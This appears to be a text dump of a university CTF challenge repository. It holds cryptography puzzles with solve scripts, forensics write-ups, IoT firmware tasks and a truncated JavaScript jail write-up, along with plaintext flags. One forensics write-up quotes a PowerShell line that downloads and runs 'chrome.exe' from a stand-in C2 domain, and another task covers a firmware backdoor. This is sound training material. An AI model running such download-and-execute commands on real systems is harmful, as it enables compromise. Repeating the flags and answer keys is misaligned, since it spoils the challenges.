3 | Windy, a piano prodigy, believes that RSA encryption may not provide sufficient security to safeguard his invaluable piano mastery secrets. So, he uses his musical talents to add another layer of security to the RSA encryption scheme. Now, no one will be able to figure out his secrets! -------------------------------------------------------------------------------- /Cryptography/pianoman/chal/music_cipher.py: -------------------------------------------------------------------------------- 1 | # no secrets for you! 2 | flag = ... 3 | 4 | # Prime numbers 5 | p = 151974537061323957822386073908385085419559026351164685426097479266890291010147521691623222013307654711435195917538910433499461592808140930995554881397135856676650008657702221890681556382541341154333619026995004346614954741516470916984007797447848200982844325683748644670322174197570545222141895743221967042369 6 | q = 174984645401233071825665708002522121612485226530706132712010887487642973021704769474826989160974464933559818767568944237124745165979610355867977190192654030573049063822083356316183080709550520634370714336131664619311165756257899116089875225537979520325826655873483634761961805768588413832262117172840398661229 7 | n = p * q 8 | 9 | # a public exponent hidden away by Windy's musical talents 10 | e = ... 11 | 12 | 13 | # Converting the message to an integer 14 | m = int.from_bytes(message.encode(), 'big') 15 | 16 | # Encrypting the message: c = m^e mod n 17 | inc_m = pow(message_int, e, n) 18 | 19 | print(encrypted_message_int) 20 | -------------------------------------------------------------------------------- /Cryptography/pianoman/chal/musical_e.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Cryptography/pianoman/chal/musical_e.png -------------------------------------------------------------------------------- /Cryptography/pianoman/chal/output.txt: -------------------------------------------------------------------------------- 1 | 13798492512038760070176175279601263544116956273815547670915057561532348462120753731852024424193899030774938204962799194756105401464136384387458651343975594539877218889319074841918281784494580079814736461158750759327630935335333130007375268812456855987866715978531148043248418247223808114476698088473278808360178546541128684643502788861786419871174570376835894025839847919827231356213726961581598139013383568524808876923469958771740011288404737208217659897319372970291073214528581692244433371304465252501970552162445326313782129351056851978201181794212716520630569898498364053054452320641433167009005762663177324539460 -------------------------------------------------------------------------------- /Cryptography/pianoman/src/gen.py: -------------------------------------------------------------------------------- 1 | # no secrets for you! 2 | message = "uoftctf{AT1d2jMCVs03xxalViU9zTyiiV1INNJY}" 3 | 4 | # Prime numbers 5 | p = 151974537061323957822386073908385085419559026351164685426097479266890291010147521691623222013307654711435195917538910433499461592808140930995554881397135856676650008657702221890681556382541341154333619026995004346614954741516470916984007797447848200982844325683748644670322174197570545222141895743221967042369 6 | q = 174984645401233071825665708002522121612485226530706132712010887487642973021704769474826989160974464933559818767568944237124745165979610355867977190192654030573049063822083356316183080709550520634370714336131664619311165756257899116089875225537979520325826655873483634761961805768588413832262117172840398661229 7 | n = p * q 8 | 9 | # 7-digit a public exponent hidden away by Windy's musical talents 10 | e = 7029307 11 | 12 | 13 | # Converting the message to an integer 14 | message_int = int.from_bytes(message.encode(), 'big') 15 | 16 | # Encrypting the message: c = m^e mod n 17 | encrypted_message_int = pow(message_int, e, n) 18 | 19 | print(encrypted_message_int) 20 | -------------------------------------------------------------------------------- /Cryptography/pianoman/src/output.txt: -------------------------------------------------------------------------------- 1 | 13798492512038760070176175279601263544116956273815547670915057561532348462120753731852024424193899030774938204962799194756105401464136384387458651343975594539877218889319074841918281784494580079814736461158750759327630935335333130007375268812456855987866715978531148043248418247223808114476698088473278808360178546541128684643502788861786419871174570376835894025839847919827231356213726961581598139013383568524808876923469958771740011288404737208217659897319372970291073214528581692244433371304465252501970552162445326313782129351056851978201181794212716520630569898498364053054452320641433167009005762663177324539460 -------------------------------------------------------------------------------- /Cryptography/pianoman/src/solve.py: -------------------------------------------------------------------------------- 1 | from Crypto.Util.number import inverse 2 | 3 | # Prime numbers (p and q) 4 | p = 151974537061323957822386073908385085419559026351164685426097479266890291010147521691623222013307654711435195917538910433499461592808140930995554881397135856676650008657702221890681556382541341154333619026995004346614954741516470916984007797447848200982844325683748644670322174197570545222141895743221967042369 5 | q = 174984645401233071825665708002522121612485226530706132712010887487642973021704769474826989160974464933559818767568944237124745165979610355867977190192654030573049063822083356316183080709550520634370714336131664619311165756257899116089875225537979520325826655873483634761961805768588413832262117172840398661229 6 | 7 | # Computing n and Euler's Totient function (phi) 8 | n = p * q 9 | phi = (p - 1) * (q - 1) 10 | 11 | # find original e using music sheet cipher online 12 | e = 7029307 13 | 14 | # Computing the private exponent, d 15 | d = inverse(e, phi) 16 | 17 | 18 | # Encrypting the message: c = m^e mod n 19 | encrypted_message_int = 13798492512038760070176175279601263544116956273815547670915057561532348462120753731852024424193899030774938204962799194756105401464136384387458651343975594539877218889319074841918281784494580079814736461158750759327630935335333130007375268812456855987866715978531148043248418247223808114476698088473278808360178546541128684643502788861786419871174570376835894025839847919827231356213726961581598139013383568524808876923469958771740011288404737208217659897319372970291073214528581692244433371304465252501970552162445326313782129351056851978201181794212716520630569898498364053054452320641433167009005762663177324539460 20 | 21 | # Decrypting the message: m = c^d mod n 22 | decrypted_message_int = pow(encrypted_message_int, d, n) 23 | 24 | # Converting the decrypted integer back to a string 25 | decrypted_message = decrypted_message_int.to_bytes((decrypted_message_int.bit_length() + 7) // 8, 'big').decode() 26 | 27 | print(decrypted_message) 28 | -------------------------------------------------------------------------------- /Cryptography/repeat/README.md: -------------------------------------------------------------------------------- 1 | # repetitions 2 | 3 | I'm a known repeat offender when it comes to bad encryption habits. But the secrets module is secure, so you'll never be able to guess my key! -------------------------------------------------------------------------------- /Cryptography/repeat/chal/flag.enc: -------------------------------------------------------------------------------- 1 | Flag: 982a9290d6d4bf88957586bbdcda8681de33c796c691bb9fde1a83d582c886988375838aead0e8c7dc2bc3d7cd97a4 -------------------------------------------------------------------------------- /Cryptography/repeat/chal/gen.py: -------------------------------------------------------------------------------- 1 | import os 2 | import secrets 3 | 4 | flag = "REDACATED" 5 | xor_key = secrets.token_bytes(8) 6 | 7 | def xor(message, key): 8 | return bytes([message[i] ^ key[i % len(key)] for i in range(len(message))]) 9 | 10 | encrypted_flag = xor(flag.encode(), xor_key).hex() 11 | 12 | with open("flag.enc", "w") as f: 13 | f.write("Flag: "+encrypted_flag) -------------------------------------------------------------------------------- /Cryptography/repeat/src/flag.enc: -------------------------------------------------------------------------------- 1 | Flag: 982a9290d6d4bf88957586bbdcda8681de33c796c691bb9fde1a83d582c886988375838aead0e8c7dc2bc3d7cd97a4 -------------------------------------------------------------------------------- /Cryptography/repeat/src/gen.py: -------------------------------------------------------------------------------- 1 | import os 2 | import secrets 3 | 4 | flag = "uoftctf{x0r_iz_r3v3rs1bl3_w17h_kn0wn_p141n73x7}" 5 | xor_key = secrets.token_bytes(8) 6 | 7 | def xor(message, key): 8 | return bytes([message[i] ^ key[i % len(key)] for i in range(len(message))]) 9 | 10 | encrypted_flag = xor(flag.encode(), xor_key).hex() 11 | 12 | with open("flag.enc", "w") as f: 13 | f.write("Flag: "+encrypted_flag) -------------------------------------------------------------------------------- /Cryptography/repeat/src/solve.py: -------------------------------------------------------------------------------- 1 | import os 2 | 3 | def xor(message, key): 4 | return bytes([message[i] ^ key[i % len(key)] for i in range(len(message))]) 5 | 6 | with open("flag.enc", "r") as f: 7 | encrypted_flag = f.read().split(" ")[1] 8 | f.close() 9 | encrypted_flag = bytes.fromhex(encrypted_flag) 10 | known_plaintext = "uoftctf{".encode() 11 | key = bytes([encrypted_flag[i] ^ known_plaintext[i] for i in range(len(known_plaintext))]) 12 | 13 | # decrypt flag 14 | flag = xor(encrypted_flag, key) 15 | print(flag.decode()) 16 | -------------------------------------------------------------------------------- /Cryptography/wheel-barrow/README.md: -------------------------------------------------------------------------------- 1 | A wheelbarrow ran over the flag. Can you fix it? 2 | 3 | Please wrap the flag in `uoftctf{}`. Please keep the `$` in the flag when submitting. 4 | -------------------------------------------------------------------------------- /Cryptography/wheel-barrow/chal/transformed.txt: -------------------------------------------------------------------------------- 1 | hc0rhh3r3ylmsrwr___lsewt_03raf_rpetouin$_3tb0_t 2 | -------------------------------------------------------------------------------- /Cryptography/wheel-barrow/src/solve.md: -------------------------------------------------------------------------------- 1 | # Solution 2 | To solve, recognize that wheel-barrow transform is a pun on the Burrows-Wheeler Transform (BWT), a common technique in compression. 3 | 4 | To decode texts written in BWT, the text must be in one of two formats 5 | - Text with an ending token like `$` 6 | - Text with an associated index indicating which entry is the correct string 7 | 8 | Commonly in literature surrounding the BWT, `$` represents the ending of the string, so we should recognize that. 9 | 10 | Because this text is written with an ending token, we should use an algorithm to decode it using that format. However, I'm lazy so we can instead use an existing BWT decoder that takes as input the index and the encoded string and attempts to decode it. Since we don't know the index of the correct string, we brute force the values from 1-47 since the index can be at most the length of the transformed text. The decoding that has the ending token `$` at the end of the string is the only valid decoding which we get as `th3_burr0w_wh33ler_transform_is_pr3tty_c00l_eh$` 11 | 12 | We can use any existing decoder to do so such as: https://www.dcode.fr/burrows-wheeler-transform 13 | 14 | The only valid index is 40 which we input to get the flag (here dcode calls it key). 15 | 16 | # Flag 17 | The flag is what we got just wrapped in `uoftctf{th3_burr0w_wh33ler_transform_is_pr3tty_c00l_eh$}`. 18 | -------------------------------------------------------------------------------- /Forensics/EnableMe/README.md: -------------------------------------------------------------------------------- 1 | # EnableMe 2 | 3 | You've received a confidential document! Follow the instructions to unlock it. -------------------------------------------------------------------------------- /Forensics/EnableMe/chal/invoice.docm: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Forensics/EnableMe/chal/invoice.docm -------------------------------------------------------------------------------- /Forensics/EnableMe/solve/flag: -------------------------------------------------------------------------------- 1 | uoftctf{d0cx_f1l35_c4n_run_c0de_t000} -------------------------------------------------------------------------------- /Forensics/EnableMe/solve/solve.py: -------------------------------------------------------------------------------- 1 | # Extract the macro manually or by using oletools. Python script is not necessary to solve the challenge, you can simply call MsgBox on v9 instead of v10. 2 | 3 | def xor(data, key): 4 | return ''.join(chr(char ^ ord(key[i % len(key)])) for i, char in enumerate(data)) 5 | 6 | enc_flag = [98, 120, 113, 99, 116, 99, 113, 108, 115, 39, 116, 111, 72, 113, 38, 123, 36, 34, 72, 116, 35, 121, 72, 101, 98, 121, 72, 116, 39, 115, 114, 72, 99, 39, 39, 39, 106] 7 | enc_msg = [44, 32, 51, 84, 43, 53, 48, 62, 68, 114, 38, 61, 17, 70, 121, 45, 112, 126, 26, 39, 21, 78, 21, 7, 6, 26, 127, 8, 89, 0, 1, 54, 26, 87, 16, 10, 84] 8 | 9 | flag_key = 23 10 | 11 | flag = xor(enc_flag, chr(flag_key)) 12 | msg = xor(enc_msg, flag) 13 | 14 | print(flag) 15 | print(msg) 16 | -------------------------------------------------------------------------------- /Forensics/EnableMe/src/macro.vba: -------------------------------------------------------------------------------- 1 | Sub AutoOpen() 2 | Dim v6 As Variant, v7 As Variant 3 | v6 = Array(98, 120, 113, 99, 116, 99, 113, 108, 115, 39, 116, 111, 72, 113, 38, 123, 36, 34, 72, 116, 35, 121, 72, 101, 98, 121, 72, 116, 39, 115, 114, 72, 99, 39, 39, 39, 106) 4 | v7 = Array(44, 32, 51, 84, 43, 53, 48, 62, 68, 114, 38, 61, 17, 70, 121, 45, 112, 126, 26, 39, 21, 78, 21, 7, 6, 26, 127, 8, 89, 0, 1, 54, 26, 87, 16, 10, 84) 5 | 6 | Dim v8 As Integer: v8 = 23 7 | 8 | Dim v9 As String, v10 As String, v4 As String, i As Integer 9 | v9 = "" 10 | For i = 0 To UBound(v6) 11 | v9 = v9 & Chr(v6(i) Xor Asc(Mid(Chr(v8), (i Mod Len(Chr(v8))) + 1, 1))) 12 | Next i 13 | 14 | v10 = "" 15 | For i = 0 To UBound(v7) 16 | v10 = v10 & Chr(v7(i) Xor Asc(Mid(v9, (i Mod Len(v9)) + 1, 1))) 17 | Next i 18 | 19 | MsgBox v10 20 | End Sub 21 | 22 | -------------------------------------------------------------------------------- /Forensics/Hourglass/README.md: -------------------------------------------------------------------------------- 1 | # Hourglass 2 | 3 | W0mp W0mp would you look at that, once again the security engineering team forgot to install an EDR agent. 4 | 5 | We imaged this machine to pass it on to the forensics team, your task is to find IoCs and possibly the flags. 6 | 7 | GLHF - 0x157 8 | 9 | -------------------------------------------------------------------------------- /Forensics/Hourglass/chal/info.txt: -------------------------------------------------------------------------------- 1 | This is a large windows 10 vm. If you need the link feel free to reach out to me on discord 0x157. 2 | -------------------------------------------------------------------------------- /Forensics/Hourglass/command.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Forensics/Hourglass/command.png -------------------------------------------------------------------------------- /Forensics/Hourglass/solve/README.md: -------------------------------------------------------------------------------- 1 | ### Hourglass 2 | 3 | Category: **Forensics** 4 | 5 | Once we download the vm and import it to virtualbox, we can start solving the challenge. 6 | 7 | Browsing around the Desktop, we are greeted with 2 files `Readme.txt and flag.txt`, the readme contains the backstory of the challenge and flag.txt which has a fake flag inside of it. 8 | 9 | ![](init.png) 10 | 11 | If we take a note of the challenge name, it becomes clear that the challenge has something to do with **`time`**. 12 | 13 | Knowing that this is a forensics challenge we first can check out a utility that windows offers which is called **Task Scheduler**. For people who are not sure what it is, essentially its used to schedule tasks, very similar to how cron jobs work in *unix. 14 | 15 | ![](tasks.png) 16 | 17 | Checking out the tasks that are scheduled to run, we can quickly notice a weird task called `Security Scan`, if we inspect the task and see the Actions of it, there seems to be an odd command running using an executable called "stomp.exe". Not normal at all. 18 | 19 | There is also one more file provided in the commnad which is located @ *C:\Windows\DiagTrack\Settings\settings.txt* 20 | 21 | ![](../command.png) 22 | 23 | `Ky0tCiB1b2Z0Y3Rme1Q0c0tfU2NoM0R1bDNyX0ZVTn0KKy0t` 24 | 25 | Going to that file and opening it yields a base64 string, which when decoded should give us the flag. 26 | 27 | **uoftctf{T4sK_Sch3Dul3r_FUN}** 28 | -------------------------------------------------------------------------------- /Forensics/Hourglass/solve/init.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Forensics/Hourglass/solve/init.png -------------------------------------------------------------------------------- /Forensics/Hourglass/solve/tasks.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Forensics/Hourglass/solve/tasks.png -------------------------------------------------------------------------------- /Forensics/Illusion/traffic.pcapng: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Forensics/Illusion/traffic.pcapng -------------------------------------------------------------------------------- /Forensics/NoGrep/README.md: -------------------------------------------------------------------------------- 1 | ### No Grep 2 | 3 | Category: **Forensics** 4 | 5 | "Use the VM from Hourglass to find the second flag on the system" 6 | 7 | Back at it again, this was a pretty straight forward challenge, involving some script analysis and viewing Microsoft Defender Exclusions. 8 | 9 | If we go to defender settings -> Virus & Threat Protection -> Exclusions. We will see a certain file getting excluded from windows defender to ignore. Very odd if you ask me. 10 | 11 | The full path that we can see is *C:\Windows\Web\Wallpaper\Theme2\update.ps1" 12 | 13 | ![](path.png) 14 | 15 | Let's visit the path and inspect the script content. 16 | 17 | ```powershell 18 | $String_Key = 'W0wMadeitthisfar' 19 | 20 | $NewValue = '$(' + (([int[]][char[]]$String | ForEach-Object { "[char]$($_)" }) -join '+') + ')' 21 | 22 | $chars = 34, 95, 17, 57, 2, 16, 3, 18, 68, 16, 12, 54, 4, 82, 24, 45, 35, 0, 40, 63, 20, 10, 58, 25, 3, 65, 0, 20 23 | 24 | $keyAscii = $String_Key.ToCharArray() | ForEach-Object { [int][char]$_ } 25 | 26 | $resultArray = $chars -bxor $keyAscii 27 | 28 | IEX (Invoke-WebRequest -Uri 'https://somec2attackerdomain.com/chrome.exe' -UseBasicParsing).Content 29 | 30 | ``` 31 | 32 | We can see what this script is doing in plaintext, doesent to be very obfuscated right ? 33 | 34 | First thing to note here is the $String_Key variable as well as $chars. 35 | 36 | Looking at $resultArray, we can also see that those chars are getting *xorred* with the key we saw earlier. 37 | 38 | Decrypt this by using cyberchef or write your own xor decryption script with python or try fixing up the powershell code to print the result. 39 | 40 | ![](decode.png) 41 | 42 | **uoftctf{0dd_w4y_t0_run_pw5h}** 43 | -------------------------------------------------------------------------------- /Forensics/NoGrep/decode.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Forensics/NoGrep/decode.png -------------------------------------------------------------------------------- /Forensics/NoGrep/path.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Forensics/NoGrep/path.png -------------------------------------------------------------------------------- /Forensics/Secret Message 2/chal/redacted.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Forensics/Secret Message 2/chal/redacted.png -------------------------------------------------------------------------------- /Forensics/Secret Message 2/solve/cropped.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Forensics/Secret Message 2/solve/cropped.png -------------------------------------------------------------------------------- /Forensics/Secret Message 2/solve/flag: -------------------------------------------------------------------------------- 1 | uoftctf{pokemon_catching_ezz} -------------------------------------------------------------------------------- /Forensics/Secret Message 2/solve/output.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Forensics/Secret Message 2/solve/output.png -------------------------------------------------------------------------------- /Forensics/Secret Message 2/solve/writeup.md: -------------------------------------------------------------------------------- 1 | Crop the image, then use [unredacter](https://github.com/bishopfox/unredacter) to decode the pixels into plaintext. Ensure that you modify the program to use the correct character set: 2 | 3 | ```ts 4 | const guessable_characters = 'abcdefghijklmnopqrstuvwxyz_ '; 5 | ``` 6 | 7 | # Output 8 | 9 | ![The output](output.png) 10 | 11 | The program gets the last character of the flag wrong, `a` instead of `z`. However, you can verify the last character is `z` by using the "Make Your Own Redacted Text" feature and comparing the output with the original image. All that's left is to wrap the output in `uoftctf{}`. 12 | 13 | # Flag 14 | 15 | `uoftctf{pokemon_catching_ezz}` 16 | -------------------------------------------------------------------------------- /Forensics/Secret Message/chal/secret.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Forensics/Secret Message/chal/secret.pdf -------------------------------------------------------------------------------- /Forensics/Secret Message/solve/flag: -------------------------------------------------------------------------------- 1 | uoftctf{fired_for_leaking_secrets_in_a_pdf} -------------------------------------------------------------------------------- /Forensics/Secret Message/solve/writeup.md: -------------------------------------------------------------------------------- 1 | # Extract the flag 2 | 3 | Use the tool `pdftotext` to extract the text from the PDF file. 4 | 5 | ```bash 6 | pdftotext secret.pdf 7 | ``` 8 | 9 | # Output 10 | 11 | ``` 12 | Confidential Document 13 | TRANSCRIPT: A Very Private Conversation 14 | 15 | Person 1: "So, have you reviewed the latest security measures?" 16 | Person 2: "I have. The team's done a thorough job this time." 17 | Person 1: "Especially after the last breach, we couldn't take any chances." 18 | Person 2: "Absolutely. The new encryption protocols should prevent similar incidents." 19 | Person 1: "What about the insider threat? Any measures against that?" 20 | Person 2: "Yes, they've implemented strict access controls and regular audits." 21 | Person 1: "Good to hear. By the way, how's the CTF challenge coming along?" 22 | Person 2: "Oh, it's going great. We've got some tricky puzzles this time." 23 | Person 1: "Just make sure the flag is well-protected. We don't want a repeat of last time." 24 | Person 2: "Definitely not. The flag 'uoftctf{fired_for_leaking_secrets_in_a_pdf}' is securely 25 | embedded." 26 | Person 1: "Great. But remember, that's between us." 27 | Person 2: "Of course. Confidentiality is key in these matters." 28 | Person 1: "Alright, I trust your discretion. Let's keep it under wraps." 29 | Person 2: "Agreed. We'll debrief the team about general security, but specifics stay with us." 30 | Person 1: "Sounds like a plan. Let's meet next week for another update." 31 | Person 2: "Will do. Take care until then." 32 | ``` -------------------------------------------------------------------------------- /IoT/babys_first_iot/LICENSE: -------------------------------------------------------------------------------- 1 | Copyright 2024 Aon plc 2 | 3 | Licensed under the Apache License, Version 2.0 (the "License"); 4 | you may not use this file except in compliance with the License. 5 | You may obtain a copy of the License at 6 | 7 | http://www.apache.org/licenses/LICENSE-2.0 8 | 9 | Unless required by applicable law or agreed to in writing, software 10 | distributed under the License is distributed on an "AS IS" BASIS, 11 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | See the License for the specific language governing permissions and 13 | limitations under the License. 14 | -------------------------------------------------------------------------------- /IoT/babys_first_iot/README.md: -------------------------------------------------------------------------------- 1 | # University of Toronto CTF 2024 2 | 3 | Flag 1 - Here is an FCC ID, Q87-WRT54GV81, what is the frequency in MHz for Channel 6 for that device? Submit the answer to port 3895. 4 | 5 | Flag 2 - What company makes the processor for this device? https://fccid.io/Q87-WRT54GV81/Internal-Photos/Internal-Photos-861588. Submit the answer to port 6318. 6 | 7 | Flag 3 - Submit the command used in U-Boot to look at the system variables to port 1337 as a GET request ex. http://35.225.17.48:1337/{command}. This output is needed for another challenge. 8 | 9 | Flag 4 – Submit the full command you would use in U-Boot to set the proper environment variable to a /bin/sh process upon boot to get the flag on the webserver at port 7777. Do not include the ‘bootcmd’ command. It will be in the format of "something something=${something} something=something" Submit the answer on port 9123. 10 | 11 | Flag 5 - At http://35.225.17.48:1234/firmware1.bin you will find the firmware. Extract the contents, find the hidden back door in the file that is the first process to run on Linux, connect to the backdoor, submit the password to get the flag. Submit the password to port 4545. 12 | 13 | Flag 6 - At http://35.225.17.48:7777/firmware2.bin you will find another firmware, submit the number of lines in the ‘ethertypes’ file multiplied by 74598 for the flag on port 8888. 14 | 15 | Hint: If there is an issue with submitting an answer with a challenge, try including newlines and null characters. For example: ‘printf 'answer\n\0' | nc 35.225.17.48 port’ 16 | -------------------------------------------------------------------------------- /IoT/babys_first_iot/remote_chal/Challenge4/printenv: -------------------------------------------------------------------------------- 1 | addmisc=setenv bootargs ${bootargs}console=ttyS0,${baudrate}panic=1 2 | baudrate=57600 3 | bootaddr=(0xBC000000 + 0x1e0000) 4 | bootargs=console=ttyS1,57600 root=/dev/mtdblock8 rts_hconf.hconf_mtd_idx=0 mtdparts=m25p80:256k(boot),128k(pib),1024k(userdata),128k(db),128k(log),128k(dbbackup),128k(logbackup),3072k(kernel),11264k(rootfs) 5 | bootcmd=bootm 0xbc1e0000 6 | bootfile=/vmlinux.img 7 | ethact=r8168#0 8 | ethaddr=00:00:00:00:00:00 9 | load=tftp 80500000 ${u-boot} 10 | loadaddr=0x82000000 11 | stderr=serial 12 | stdin=serial 13 | stdout=serial 14 | 15 | Environment size: 533/131068 bytes 16 | -------------------------------------------------------------------------------- /IoT/babys_first_iot/remote_chal/Challenge6/Challenge6.7z: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/IoT/babys_first_iot/remote_chal/Challenge6/Challenge6.7z -------------------------------------------------------------------------------- /IoT/babys_first_iot/remote_chal/Challenge7/firmware2.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/IoT/babys_first_iot/remote_chal/Challenge7/firmware2.bin -------------------------------------------------------------------------------- /IoT/babys_first_iot/remote_chal/Challenge8_9/.flag9/.flag9: -------------------------------------------------------------------------------- 1 | {I_Couldn't_Hide_From_You!} 2 | -------------------------------------------------------------------------------- /IoT/babys_first_iot/remote_chal/Challenge8_9/Binary: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/IoT/babys_first_iot/remote_chal/Challenge8_9/Binary -------------------------------------------------------------------------------- /IoT/babys_first_iot/remote_chal/Challenge8_9/File/Binary: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/IoT/babys_first_iot/remote_chal/Challenge8_9/File/Binary -------------------------------------------------------------------------------- /IoT/babys_first_iot/remote_chal/Challenge8_9/flag8: -------------------------------------------------------------------------------- 1 | {Command_Injections_Are_Fun!} 2 | -------------------------------------------------------------------------------- /IoT/babys_first_iot/remote_chal/StartHackNight.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | #Challenge 1 4 | ./Submit_Chall1_answer/Challenge1& 5 | 6 | #Challenge 2 7 | ./Submit_Chall2_answer/Challenge2& 8 | 9 | #Challenge 3 10 | #Message Admin on Discord 11 | 12 | #Challenge 4 13 | python3 -m http.server 1337 -d ./Challenge4& 14 | 15 | #Challenge 5 16 | ./Submit_Chall5_answer/Challenge5& 17 | 18 | #Challenge 6 19 | python3 -m http.server 1234 -d ./Challenge6& 20 | ./Submit_Chall6_answer/Challenge6& 21 | 22 | #Challenge 7 23 | python3 -m http.server 7777 -d ./Challenge7& 24 | ./Submit_Chall7_answer/Challenge7& 25 | 26 | #Challenge 8 and 9 27 | python3 -m http.server 1111 -d ./Challenge8_9/File& 28 | ./Challenge8_9/Binary& 29 | -------------------------------------------------------------------------------- /IoT/babys_first_iot/remote_chal/Submit_Chall1_answer/Challenge1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/IoT/babys_first_iot/remote_chal/Submit_Chall1_answer/Challenge1 -------------------------------------------------------------------------------- /IoT/babys_first_iot/remote_chal/Submit_Chall2_answer/Challenge2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/IoT/babys_first_iot/remote_chal/Submit_Chall2_answer/Challenge2 -------------------------------------------------------------------------------- /IoT/babys_first_iot/remote_chal/Submit_Chall5_answer/Challenge5: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/IoT/babys_first_iot/remote_chal/Submit_Chall5_answer/Challenge5 -------------------------------------------------------------------------------- /IoT/babys_first_iot/remote_chal/Submit_Chall6_answer/Challenge6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/IoT/babys_first_iot/remote_chal/Submit_Chall6_answer/Challenge6 -------------------------------------------------------------------------------- /IoT/babys_first_iot/remote_chal/Submit_Chall7_answer/Challenge7: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/IoT/babys_first_iot/remote_chal/Submit_Chall7_answer/Challenge7 -------------------------------------------------------------------------------- /IoT/babys_first_iot/src/Challenge1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/IoT/babys_first_iot/src/Challenge1 -------------------------------------------------------------------------------- /Jail/baby_js_blacklist/README.md: -------------------------------------------------------------------------------- 1 | # Baby JS Blacklist 2 | 3 | I hate functions. I hate them so much, that I made it so that you can never call them! 4 | 5 | Note: Solving this challenge will unlock another challenge, "JS Blacklist". -------------------------------------------------------------------------------- /Jail/baby_js_blacklist/chal/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM node:20-bullseye-slim AS app 2 | RUN useradd -m ctfuser 3 | RUN chown root:root /home/ctfuser 4 | RUN chmod 755 /home/ctfuser 5 | 6 | WORKDIR /home/ctfuser/app 7 | 8 | COPY --chown=root:root package.json . 9 | COPY --chown=root:root chal.js . 10 | 11 | RUN npm install 12 | 13 | RUN echo "uoftctf{b4by_j4v4scr1p7_gr3w_up_4nd_b3c4m3_4_h4ck3r}" > /home/ctfuser/app/flag && \ 14 | 15 | chmod 444 /home/ctfuser/app/flag 16 | 17 | RUN chmod -R 555 /home/ctfuser/ 18 | 19 | FROM pwn.red/jail 20 | 21 | COPY --from=app / /srv 22 | 23 | COPY --chmod=555 run /srv/app/run 24 | 25 | ENV JAIL_PIDS=40 JAIL_MEM=100M JAIL_TIME=120 -------------------------------------------------------------------------------- /Jail/baby_js_blacklist/chal/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "js_jail", 3 | "version": "1.0.0", 4 | "description": "", 5 | "main": "chal.js", 6 | "scripts": { 7 | "test": "echo \"Error: no test specified\" && exit 1" 8 | }, 9 | "keywords": [], 10 | "author": "SteakEnthusiast", 11 | "license": "ISC", 12 | "dependencies": { 13 | "@babel/generator": "^7.23.6", 14 | "@babel/parser": "^7.23.6", 15 | "@babel/traverse": "^7.23.6", 16 | "readline": "^1.3.0" 17 | }, 18 | "type": "module" 19 | } 20 | -------------------------------------------------------------------------------- /Jail/baby_js_blacklist/chal/run: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | cd /home/ctfuser/app 3 | /usr/local/bin/node /home/ctfuser/app/chal.js -------------------------------------------------------------------------------- /Jail/baby_js_blacklist/solve/flag: -------------------------------------------------------------------------------- 1 | uoftctf{b4by_j4v4scr1p7_gr3w_up_4nd_b3c4m3_4_h4ck3r} -------------------------------------------------------------------------------- /Jail/baby_js_blacklist/solve/writeup.md: -------------------------------------------------------------------------------- 1 | # Payload 2 | 3 | There 